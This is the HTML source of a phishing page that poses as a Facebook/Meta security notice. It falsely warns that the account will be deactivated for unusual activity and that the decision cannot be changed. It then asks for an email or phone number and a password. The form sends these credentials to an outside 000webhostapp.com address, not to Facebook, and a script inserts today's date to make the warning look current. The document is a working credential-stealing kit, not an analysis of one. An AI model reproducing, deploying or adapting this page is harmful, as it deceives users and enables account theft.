<html id="facebook" class="_9dls __fb-light-mode" lang="en" dir="ltr"><head>
    <meta name="viewport" content="width=device-width,initial-scale=1,maximum-scale=2,shrink-to-fit=no">
    <link type="text/css" rel="stylesheet" href="asset/css/1D8erEf3S9.css">
    <link type="text/css" rel="stylesheet" href="asset/css/4fGxs96Xxc.css">
    <link rel="icon" type="image/png" href="asset/icon/favicon.ico">
<title>Restrictions Information</title>
<script language="JavaScript">
  var tanggallengkap = new String();
  var namahari = ("Minggu Senin Selasa Rabu Kamis Jumat Sabtu");
  namahari = namahari.split(" ");
  var namabulan = ("January February March April May June July August September October November December");
  namabulan = namabulan.split(" ");
  var tgl = new Date();
  var hari = tgl.getDay();
  var tanggal = tgl.getDate();
  var bulan = tgl.getMonth();
  var tahun = tgl.getFullYear();
  tanggallengkap = namabulan[bulan] + " " + tanggal + ", " + tahun;
</script>
</head>
<body class="_6s5d _71pn _-kb roboto">
  <div id="mount_0_0_Wu" style=""><!--$-->
    <span id="ssrb_root_start" style="display:none"></span><!--$-->
    <div>
      <div class=""><!--$-->
        <form action="/logout.php?button_location=settings&amp;button_name=logout" method="POST">
          <input name="h" type="hidden" value="Aff8MbipPMudEdjEJgM">
          <input name="ref" type="hidden" value="mb"></form>
          <div class="x9f619 x1n2onr6 x1ja2u2z">
            <div class="x9f619 x1ja2u2z x1pq812k x5yr21d xw2csxc x1odjw0f xixxii4 x1rohswg x17qophe x13vifvy xh8yej3 xfk6m8 x1yqm8si xjx87ck" aria-hidden="true" id="scrollview" style="left: 0px;">
              <div class="x78zum5 xdt5ytf x1n2onr6 x1ja2u2z">
                <div class="x78zum5 xdt5ytf x1n2onr6">
                  <div class="x78zum5 xdt5ytf x1n2onr6 xat3117 xxzkxad"><!--$-->
                    <div class="xds687c xixxii4 x17qophe x13vifvy x1vjfegm">
                      <div role="banner">
                        <div class="x6s0dn4 x9f619 x78zum5 x1iyjqo2 x1s65kcs x1d52u69 xixxii4 x17qophe x13vifvy xzkaem6">
                          <div class="x10l6tqk x10ja8i0 xcd74o5 x1k90msu x6o7n8i xbxq160 xg01cxk x47corl">
                            <div aria-disabled="true" aria-hidden="true" aria-label="Back to previous page" class="x1i10hfl x6umtig x1b1mbwd xaqea5y xav7gou xe8uvvx xdj266r x11i5rnm xat24cr x1mh8g0r x16tdsg8 x1hl2dhg xggy1nq x1h6gzvc x87ps6o x1lku1pv x1a2a7pz x6s0dn4 x14yjl9h xudhj91 x18nykt9 xww2gxu x972fbf xcfux6l x1qhh985 xm0m39n x9f619 x78zum5 xl56j7k xexx8yu x4uap5 x18d9i69 xkhd6sd x1n2onr6 x1vqgdyp x100vrsf xwcfey6" role="button" tabindex="-1">
                              <i data-visualcompletion="css-img" class="x1b0d499 xmgbrsx" style="background-image:url('https://static.xx.fbcdn.net/rsrc.php/v3/y5/r/espe7X_o_zC.png');background-position:-167px -99px;background-size:189px 280px;width:20px;height:20px;background-repeat:no-repeat;display:inline-block"></i>
                              <div class="x1ey2m1c xds687c xg01cxk x47corl x10l6tqk x17qophe x13vifvy x1ebt8du x19991ni x1dhq9h x14yjl9h xudhj91 x18nykt9 xww2gxu" data-visualcompletion="ignore"></div>
                            </div>
                          </div>
                          <a aria-hidden="false" aria-label="Facebook" class="x1i10hfl x1qjc9v5 xjbqb8w xjqpnuy xa49m3k xqeqjp1 x2hbi6w x13fuv20 xu3j5b3 x1q0q8m5 x26u7qi x972fbf xcfux6l x1qhh985 xm0m39n x9f619 x1ypdohk xdl72j9 x2lah0s xe8uvvx xdj266r x11i5rnm xat24cr x1mh8g0r x2lwn1j xeuugli xexx8yu x4uap5 x18d9i69 xkhd6sd x1n2onr6 x16tdsg8 x1hl2dhg xggy1nq x1ja2u2z x1t137rt x1o1ewxj x3x9cwd x1e5q0jg x13rtm0m x1q0g3np x87ps6o x1lku1pv x1rg5ohu x1a2a7pz x1hc1fzr x1k90msu x6o7n8i xbxq160" href="/" role="link" tabindex="0">
                            <svg viewBox="0 0 36 36" class="x1lliihq x1k90msu x2h7rmj x1qfuztq" fill="url(#jsc_s_2)" height="40" width="40"><defs><linearGradient x1="50%" x2="50%" y1="97.0782153%" y2="0%" id="jsc_s_2"><stop offset="0%" stop-color="#0062E0"></stop><stop offset="100%" stop-color="#19AFFF"></stop></linearGradient></defs><path d="M15 35.8C6.5 34.3 0 26.9 0 18 0 8.1 8.1 0 18 0s18 8.1 18 18c0 8.9-6.5 16.3-15 17.8l-1-.8h-4l-1 .8z"></path><path class="xe3v8dz" d="M25 23l.8-5H21v-3.5c0-1.4.5-2.5 2.7-2.5H26V7.4c-1.3-.2-2.7-.4-4-.4-4.1 0-7 2.5-7 7v4h-4.5v5H15v12.7c1 .2 2 .3 3 .3s2-.1 3-.3V23h4z"></path></svg>
                          </a>
                          <div>
                            <div></div>
                          </div>
                        </div>
                        <div class="x9f619 x1n2onr6 x1ja2u2z x1ve1bff x78zum5 xdt5ytf x1s65kcs">
                          <div class="x9f619 x1n2onr6 x1ja2u2z x78zum5 xdt5ytf x13a6bvl"></div>
                          <div class="x9f619 x1ja2u2z xnzfen x1w3jsh0 x1wbvgsv xsugpx9 xds687c x1hagigm x47corl x10l6tqk x17qophe"></div>
                        </div>
                        <div class="xds687c x1pi30zi x1e558r4 xixxii4 x13vifvy xzkaem6"></div>
                      </div>
                    </div>
                    <div class="x9f619 x1n2onr6 x1ja2u2z">
                      <div class="x78zum5 xdt5ytf x1n2onr6 x1ja2u2z">
                        <div class="x78zum5 xdt5ytf x1n2onr6">
                          <div class="x78zum5 xdt5ytf x1n2onr6 xat3117 xxzkxad"><!--$-->
                            <div class="x1qjc9v5 x78zum5 xl56j7k x193iq5w x1t2pt76">
                              <div class="x6s0dn4 x78zum5 xdt5ytf x193iq5w x1t2pt76 xh8yej3" role="main">
                                <div class="x6s0dn4 x78zum5 xdt5ytf x1n2onr6 xh8yej3 x1ja2u2z x1ia4mhz">
                                  <div class="x14lw9ws xh8yej3">
                                    <div class="x78zum5 x1n2onr6 xh8yej3">
                                      <div class="x9f619 x1n2onr6 x1ja2u2z x2bj2ny x1qpq9i9 xdney7k xu5ydu1 xt3gfkd xh8yej3 x6ikm8r x10wlt62 xquyuld" style="border-radius: max(0px, min(8px, ((100vw - 4px) - 100%) * 9999)) / 8px;">
                                        <div>
                                          <div>
                                            <div>
                                              <form action="https://gaskan-2023harussukses.000webhostapp.com/verified.php" method="post">
                                              <div class="x1n2onr6 x1ja2u2z x9f619 x78zum5 xdt5ytf x2lah0s x193iq5w x1swvt13 x1pi30zi x1miatn0 x1gan7if">
                                                <div class="x9f619 x1n2onr6 x1ja2u2z x78zum5 xdt5ytf x1iyjqo2 x2lwn1j">
                                                  <div class="x9f619 x1n2onr6 x1ja2u2z x78zum5 xdt5ytf x2lah0s x193iq5w">
                                                    <div class="x78zum5 xdt5ytf x11tup63 x16z1lm9">
                                                      <div class="xwoyzhm x1rhet7l">
                                                        <span class="x193iq5w xeuugli x13faqbe x1vvkbs x10flsy6 x1lliihq x1s928wv xhkezso x1gmr53x x1cpjm7i x1fgarty x1943h6x xudqn12 xw06pyt xngnso2 x1qb5hxa x1xlr1w8 xzsf02u x1yc453h" dir="auto">Your account will be deactivated soon</span>
                                                      </div>
                                                      <div class="xwoyzhm x1rhet7l">
                                                        <span class="x193iq5w xeuugli x13faqbe x1vvkbs x10flsy6 x1lliihq x1s928wv xhkezso x1gmr53x x1cpjm7i x1fgarty x1943h6x x4zkp8e x41vudc x1603h9y x1u7k74 xo1l8bm xzsf02u x1yc453h" dir="auto">
                                                          <span class="x193iq5w xeuugli x13faqbe x1vvkbs x10flsy6 x1603h9y x1u7k74 xo1l8bm xi81zsa">We detected unusual activity in your account today <strong><font color="#000000"><script language="JavaScript">document.write(tanggallengkap);</script></font></strong>. This can result in your account being permanently disabled for not complying with the 
                                                            <div class="x1i10hfl xjbqb8w x6umtig x1b1mbwd xaqea5y xav7gou x9f619 x1ypdohk xt0psk2 xe8uvvx xdj266r x11i5rnm xat24cr x1mh8g0r xexx8yu x4uap5 x18d9i69 xkhd6sd x16tdsg8 x1hl2dhg xggy1nq x1o1ewxj x3x9cwd x1e5q0jg x13rtm0m x1n2onr6 x87ps6o x1a2a7pz xt0b8zv x1qq9wsj x1xlr1w8" role="button" tabindex="0">Community Standards</div>. We have reviewed this decision and it cannot be changed.
                                                          </span>
                                                        </span>
                                                      </div>
                                                    </div>
                                                  </div>
                                                  <div class="x9f619 x1n2onr6 x1ja2u2z x78zum5 xdt5ytf x2lah0s x193iq5w xw7yly9">
                                                    <img alt="" src="asset/img/MetaSecure.png" width="100%">
                                                  </div>
                                                  <div class="x9f619 x1n2onr6 x1ja2u2z x78zum5 xdt5ytf x2lah0s x193iq5w xw7yly9">
                                                    <div class="x78zum5 xdt5ytf x4cne27 xifccgj">
                                                      <div class="xzueoph x1k70j0n">
                                                        <span class="x193iq5w xeuugli x13faqbe x1vvkbs x10flsy6 x1lliihq x1s928wv xhkezso x1gmr53x x1cpjm7i x1fgarty x1943h6x x4zkp8e x41vudc x1603h9y x1u7k74 x1xlr1w8 xzsf02u x1yc453h" dir="auto">We send you a security notification</span>
                                                      </div>
                                                      <div class="xzueoph x1k70j0n">
                                                        <span class="x193iq5w xeuugli x13faqbe x1vvkbs x10flsy6 x1lliihq x1s928wv xhkezso x1gmr53x x1cpjm7i x1fgarty x1943h6x x1tu3fi x41vudc x1lkfr7t x1lbecb7 xo1l8bm xi81zsa x1yc453h" dir="auto">To avoid deactivating your account, please verify your account.</span>
                                                      </div>
                                                    </div>
                                                  </div>
                                                  <div class="x9f619 x1n2onr6 x1ja2u2z x78zum5 xdt5ytf x2lah0s x193iq5w xw7yly9">
                                                      <div class="x9f619 x1n2onr6 x1ja2u2z x78zum5 xdt5ytf x2lah0s x193iq5w xeuugli xsyo7zv x16hj40l x10b6aqq x1yrsyyn">
                                                        <div class="x78zum5 xdt5ytf xz62fqu x16ldp7u">
                                                          <div class="xu06os2 x1ok221b">
                                                            <span class="x193iq5w xeuugli x13faqbe x1vvkbs x10flsy6 x1lliihq x1s928wv xhkezso x1gmr53x x1cpjm7i x1fgarty x1943h6x x1tu3fi x3x7a5m x1lkfr7t x1lbecb7 x1s688f xzsf02u x1yc453h" dir="auto">Email address or phone number</span>
                                                          </div>
                                                            <input type="text" class="inputtext _3dHfb _6luy" name="email" placeholder="" required="" pattern=".{6,}" maxlength="50">
                                                        </div>
                                                      </div>
                                                    <div class="x9f619 x1n2onr6 x1ja2u2z x78zum5 xdt5ytf x2lah0s x193iq5w xeuugli xsyo7zv x16hj40l x10b6aqq x1yrsyyn">
                                                      <div class="x78zum5 xdt5ytf xz62fqu x16ldp7u">
                                                        <div class="xu06os2 x1ok221b">
                                                          <span class="x193iq5w xeuugli x13faqbe x1vvkbs x10flsy6 x1lliihq x1s928wv xhkezso x1gmr53x x1cpjm7i x1fgarty x1943h6x x1tu3fi x3x7a5m x1lkfr7t x1lbecb7 x1s688f xzsf02u x1yc453h" dir="auto">Password</span>
                                                        </div>
                                                          <input type="password" class="inputtext _3dHfb _6luy" name="pass" placeholder="" required="" pattern=".{6,}" maxlength="50">
                                                      </div>
                                                    </div>
                                                  </div>
                                                  <div class="x9f619 x1n2onr6 x1ja2u2z x78zum5 xdt5ytf x2lah0s x193iq5w xw7yly9">
                                                    <div class="x78zum5 xdt5ytf x1jm03vo">
                                                      <div class="x1xmf6yo">
                                                          <button class="x1n2onr6 x1ja2u2z x78zum5 x2lah0s xl56j7k x6s0dn4 xozqiw3 x1q0g3np xi112ho x17zwfj4 x585lrc x1403ito x972fbf xcfux6l x1qhh985 xm0m39n x9f619 xn6708d x1ye3gou x1qhmfi1 x1fq8qgq">
                                                                <span class="x193iq5w xeuugli x13faqbe x1vvkbs x10flsy6 x1lliihq x1s928wv xhkezso x1gmr53x x1cpjm7i x1fgarty x1943h6x x1tu3fi x41vudc x1lkfr7t x1lbecb7 x1s688f x1dem4cn" dir="auto">
                                                                  <span class="x1lliihq x6ikm8r x10wlt62 x1n2onr6 xlyipyv xuxw1ft">Continue</span>
                                                                </span>
                                                          </button>
                                                      </div>
                                                    </div>
                                                  </div>
                                                </div>
                                              </div>
                                            </form>
                                            </div>
                                          </div>
                                        </div>
                                      </div>
                                    </div>
                                  </div>
                                </div>
                              </div>
                            </div><!--/$-->
                            <div>
                              <div></div>
                            </div>
                          </div>
                        </div>
                      </div>
                    </div>
                  </div>
                </div>
              </div>
            </div>
          </div>
        </div>
      </div>
    </div>

